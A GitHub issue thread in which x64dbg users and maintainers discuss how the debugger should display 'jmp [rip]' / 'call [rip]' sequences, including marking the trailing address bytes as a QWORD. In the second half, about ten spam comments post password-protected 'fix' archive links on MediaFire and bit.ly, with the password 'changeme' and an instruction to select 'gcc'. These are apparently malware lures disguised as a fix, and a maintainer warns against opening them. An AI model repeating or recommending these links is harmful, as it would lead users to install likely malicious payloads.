### ISSUE TITLE
I hope x64dbg can optimize and identify **jmp [rip] / call [rip]** and display it in one line, just like **Cheat Engine**, thanks!

### ISSUE THREAD

**Issue by mrexodia** [x64dbg/x64dbg#3411]
I hope x64dbg can optimize and identify **jmp [rip] / call [rip]** and display it in one line, just like **Cheat Engine**, thanks!

![QQ20240804-190957](https://github.com/user-attachments/assets/8e39dde4-ab5c-4b7b-bbd0-af33f1c89916)

_Originally posted by @793359277 in https://github.com/x64dbg/x64dbg/discussions/3410_

**Comment by ZehMatt** [comment]
In my opinion this doesn't make any sense, the bytes displayed should be the bytes of the instruction only and not include things the instruction references.

**Comment by 793359277** [comment]
> In my opinion this doesn't make any sense, the bytes displayed should be the bytes of the instruction only and not include things the instruction references.

Combining the 14 bytes of jmp [rip] into one line can improve readability. Because you know that the 8 bytes below FF2500000000 is an address, not normal assembly code, and this is likely to affect the subsequent instruction display.

![222](https://github.com/user-attachments/assets/01bc126e-bd88-40f6-a800-ea1a8d29ed0e)

**Comment by 793359277** [comment]
An option can be provided in the settings to let the user choose whether to optimize the display. Please.

**Comment by torusrxxx** [comment]
I agree with [ZehMatt](https://github.com/ZehMatt). The debugger should just show things "as is". "Optimizations" can be damaging because (1) the combined instruction isn't a valid instruction, so this may cause issues downstream, like in graph, tracing, or analysis (2) the address isn't executed as a part of instruction (3) we also have other "disassembler optimization" requests like #1937. If we decide to add an option for "optimized disassembler" this needs to be done in a way that do not affect graph, tracing, or analysis (4) Why not just lift the machine code https://github.com/lifting-bits/remill or even just use a decompiler if what we disassembled is no longer valid assembly code?

**Comment by 793359277** [comment]
> I agree with [ZehMatt](https://github.com/ZehMatt). The debugger should just show things "as is". "Optimizations" can be damaging because (1) the combined instruction isn't a valid instruction, so this may cause issues downstream, like in graph, tracing, or analysis (2) the address isn't executed as a part of instruction (3) we also have other "disassembler optimization" requests like #1937. If we decide to add an option for "optimized disassembler" this needs to be done in a way that do not affect graph, tracing, or analysis (4) Why not just lift the machine code https://github.com/lifting-bits/remill or even just use a decompiler if what we disassembled is no longer valid assembly code?

I think these instructions are displayed more neatly in Cheat Engine, mainly in x64dbg, 7-14 bytes of a 14-byte jump affect the display of the following instruction, which looks really bad.   Maybe it can be optimized directly in zydis? 😢

**Comment by ZehMatt** [comment]
This has nothing to do with optimizations, this is just how x86 works in general. As for the disassembly view, I think when it encounters such a jump in can mark the next bytes as an absolute address so it reads as dd or dq which I'm totally fine with, I think the issue people are having is that the data for the address is disassembled which I can understand. I'm however absolutely against combining data into instructions, that is confusing and just because CheatEngine does it doesn't mean we should do that, other than CheatEngine I can't think of any other debugger/disassembler that does it this way.

**Comment by 793359277** [comment]
> This has nothing to do with optimizations, this is just how x86 works in general. As for the disassembly view, I think when it encounters such a jump it can mark the next bytes as an absolute address so it reads as dd or dq which I'm totally fine with, I think the issue people are having is that the data for the address is disassembled which I can understand. I'm however absolutely against combining data into instructions, that is confusing and just because CheatEngine does it doesn't mean we should do that, other than CheatEngine I can't think of any other debugger/disassembler that does it this way.

Indeed, the address data is disassembled, which affects the readability of the subsequent assembly code. This is the most urgent problem to be solved.

**Comment by 793359277** [comment]
> This has nothing to do with optimizations, this is just how x86 works in general. As for the disassembly view, I think when it encounters such a jump it can mark the next bytes as an absolute address so it reads as dd or dq which I'm totally fine with, I think the issue people are having is that the data for the address is disassembled which I can understand. I'm however absolutely against combining data into instructions, that is confusing and just because CheatEngine does it doesn't mean we should do that, other than CheatEngine I can't think of any other debugger/disassembler that does it this way.


Pressing Q to display the address as a QWORD is also a solution. Perhaps you could consider letting x64dbg handle it automatically?
![7](https://github.com/user-attachments/assets/0c55ff6d-a717-4759-8190-bb9a9e98d367)

**Comment by mrexodia** [comment]
This is a very common pattern (for hooks) and I think we could automatically mark the data after `jmp [rip]` as a QWORD for the analysis. Or at the very least inform the user with an automatic comment (similar to the `call $0` comment).

**Comment by 793359277** [comment]
> This is a very common pattern (for hooks) and I think we could automatically mark the data after `jmp [rip]` as a QWORD for the analysis. Or at the very least inform the user with an automatic comment (similar to the `call $0` comment).

Thank you! Hopefully this situation will improve in the next update.😊

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by 793359277** [comment]
> This is a very common pattern (for hooks) and I think we could automatically mark the data after `jmp [rip]` as a QWORD for the analysis. Or at the very least inform the user with an automatic comment (similar to the `call $0` comment).

I have received a lot of spam in the past few days. They are all compressed files with passwords. They should be viruses. What is going on? Is someone sending them in bulk?

![QQ20240828-005711](https://github.com/user-attachments/assets/df190a3c-8d77-4182-8020-ed2f9e200bce)

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 793359277** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

f*ck  y*u!

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by torusrxxx** [comment]
This thread is locked due to continuous spamming from zombie accounts. DO NOT OPEN THE LINK IN THAT SPAM MESSAGE!
